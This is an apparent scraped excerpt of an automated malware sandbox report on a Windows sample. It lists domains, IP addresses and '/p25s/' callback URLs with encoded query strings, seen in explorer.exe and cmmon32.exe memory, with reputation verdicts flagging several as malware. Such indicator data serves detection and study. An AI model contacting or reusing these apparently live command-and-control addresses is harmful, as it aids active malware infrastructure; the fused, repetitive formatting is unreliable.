          http://www.katkisiz.info/p25s/0%Avira URL Cloudsafe
          http://www.32612.xyz/p25s/www.iqd964.com100%Avira URL Cloudmalware
          http://www.associazionefaber.com0%Avira URL Cloudsafe
          http://www.iftar.rsvp/p25s/www.associazionefaber.com0%Avira URL Cloudsafe
          http://www.32612.xyzReferer:0%Avira URL Cloudsafe
          http://www.hblcfl.comReferer:0%Avira URL Cloudsafe
          http://www.couldskuathink.comReferer:0%Avira URL Cloudsafe
          http://www.iqd964.comReferer:0%Avira URL Cloudsafe
          http://www.adamdavisgroup.com0%Avira URL Cloudsafe
          http://www.associazionefaber.comReferer:0%Avira URL Cloudsafe
          http://www.adamdavisgroup.comReferer:0%Avira URL Cloudsafe
          http://www.iqd964.com/p25s/www.allsttk.com100%Avira URL Cloudmalware
          http://www.jdyokum.comReferer:0%Avira URL Cloudsafe
          http://www.desipizza.uk0%Avira URL Cloudsafe
          http://www.adamdavisgroup.com/p25s/100%Avira URL Cloudmalware
          http://www.tjhymzz.com/p25s/www.blueskyinteractives.co.uk0%Avira URL Cloudsafe
          http://www.32612.xyz0%Avira URL Cloudsafe
          http://www.tjhymzz.com0%Avira URL Cloudsafe
          http://www.blueskyinteractives.co.uk/p25s/www.adamdavisgroup.com100%Avira URL Cloudmalware
          http://www.blueskyinteractives.co.ukReferer:0%Avira URL Cloudsafe
          http://www.fliparcher.store/p25s/100%Avira URL Cloudmalware
          http://www.pfokn.online/p25s/100%Avira URL Cloudmalware
          http://www.iftar.rsvp0%Avira URL Cloudsafe
          http://www.couldskuathink.com/p25s/?T6AhrZK=yZFdiTidJj8nP1vzUKUfsyX5oeLLmZHlT7g0d1PIFjuzqgtSB3FqzQPSF8sPoM2nTXau&W2MXm=JzuDhNAPN40%Avira URL Cloudsafe
          http://www.couldskuathink.com/p25s/www.tjhymzz.com0%Avira URL Cloudsafe
          http://www.anbietertest.com/p25s/0%Avira URL Cloudsafe
          http://www.pfokn.onlineReferer:0%Avira URL Cloudsafe
          http://www.desipizza.ukReferer:0%Avira URL Cloudsafe
          http://www.anbietertest.com/p25s/www.hblcfl.com0%Avira URL Cloudsafe
          http://www.pfokn.online100%Avira URL Cloudmalware
          http://www.jdyokum.com/p25s/www.iftar.rsvp100%Avira URL Cloudmalware
          http://www.pfokn.online/p25s/www.katkisiz.info100%Avira URL Cloudmalware
          http://www.hblcfl.com/p25s/?T6AhrZK=ewBdcR2k39opbljxfcdCb6O0QV5Mz3QFjc7TltSJEncU02WcdPmt9gDEZVm+Mf599Sy4&W2MXm=JzuDhNAPN40%Avira URL Cloudsafe
          http://www.adamdavisgroup.com/p25s/www.jdyokum.com100%Avira URL Cloudmalware
          http://www.anbietertest.com0%Avira URL Cloudsafe
          http://www.fliparcher.store0%Avira URL Cloudsafe
          http://www.allsttk.com/p25s/0%Avira URL Cloudsafe
          http://www.katkisiz.infoReferer:0%Avira URL Cloudsafe
          http://www.associazionefaber.com/p25s/www.fliparcher.store0%Avira URL Cloudsafe
          http://www.hblcfl.com/p25s/0%Avira URL Cloudsafe
          http://www.blueskyinteractives.co.uk/p25s/100%Avira URL Cloudmalware
          http://www.allsttk.com0%Avira URL Cloudsafe
          http://www.anbietertest.com/p25s/?T6AhrZK=8vxucxXa/EdtAtEUVmScDgQ/joE+PM1yWDdp5simyx02ZDdzbP+rJDfYcK0t31FDPOoC&W2MXm=JzuDhNAPN40%Avira URL Cloudsafe
          http://www.iftar.rsvpReferer:0%Avira URL Cloudsafe
          http://www.fliparcher.storeReferer:0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.hblcfl.com
          156.242.168.70
          truetrue
            unknown
            www.anbietertest.com
            45.195.140.44
            truetrue
              unknown
              www.couldskuathink.com
              160.121.126.44
              truetrue
                unknown
                www.desipizza.uk
                213.171.195.105
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  www.fliparcher.store/p25s/true
                  • Avira URL Cloud: malware
                  low
                  http://www.desipizza.uk/p25s/?T6AhrZK=Ph2/VWOiWysesScqmGnEABkQXxW9tNK0oaQwIZbckmwGK9MQJoSsZuxrXVYCsjKEmA2B&W2MXm=JzuDhNAPN4true
                  • Avira URL Cloud: safe
                  unknown
                  http://www.couldskuathink.com/p25s/?T6AhrZK=yZFdiTidJj8nP1vzUKUfsyX5oeLLmZHlT7g0d1PIFjuzqgtSB3FqzQPSF8sPoM2nTXau&W2MXm=JzuDhNAPN4true
                  • Avira URL Cloud: safe
                  unknown
                  http://www.hblcfl.com/p25s/?T6AhrZK=ewBdcR2k39opbljxfcdCb6O0QV5Mz3QFjc7TltSJEncU02WcdPmt9gDEZVm+Mf599Sy4&W2MXm=JzuDhNAPN4true
                  • Avira URL Cloud: safe
                  unknown
                  http://www.anbietertest.com/p25s/?T6AhrZK=8vxucxXa/EdtAtEUVmScDgQ/joE+PM1yWDdp5simyx02ZDdzbP+rJDfYcK0t31FDPOoC&W2MXm=JzuDhNAPN4true
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.blueskyinteractives.co.ukexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.desipizza.uk/p25s/www.couldskuathink.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.desipizza.uk/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fliparcher.store/p25s/www.pfokn.onlineexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://www.iqd964.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.jdyokum.com/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.32612.xyz/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.anbietertest.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.qq.com/404/search_children.jsexplorer.exe, 00000004.00000002.588065126.00000000157BF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000567F000.00000004.10000000.00040000.00000000.sdmpfalse
                          high
                          http://www.tiro.comSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designersSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.goodfont.co.krSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.iqd964.com/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://www.jdyokum.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.allsttk.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.couldskuathink.com/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.sajatypeworks.comSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.typography.netDSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.tjhymzz.com/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://fontfabrik.comSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.katkisiz.info/p25s/www.32612.xyzexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.couldskuathink.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.katkisiz.infoexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.iftar.rsvp/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.associazionefaber.com/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.katkisiz.info/p25s/explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tjhymzz.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.hblcfl.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fonts.comSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.sandoll.co.krSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.hblcfl.com/p25s/www.desipizza.ukexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.32612.xyz/p25s/www.iqd964.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.associazionefaber.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.iftar.rsvp/p25s/www.associazionefaber.comexplorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.sakkal.comSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.adamdavisgroup.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.associazionefaber.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.iqd964.comReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.32612.xyzReferer:explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.360740274.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.568119582.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.339990008.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.comSecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
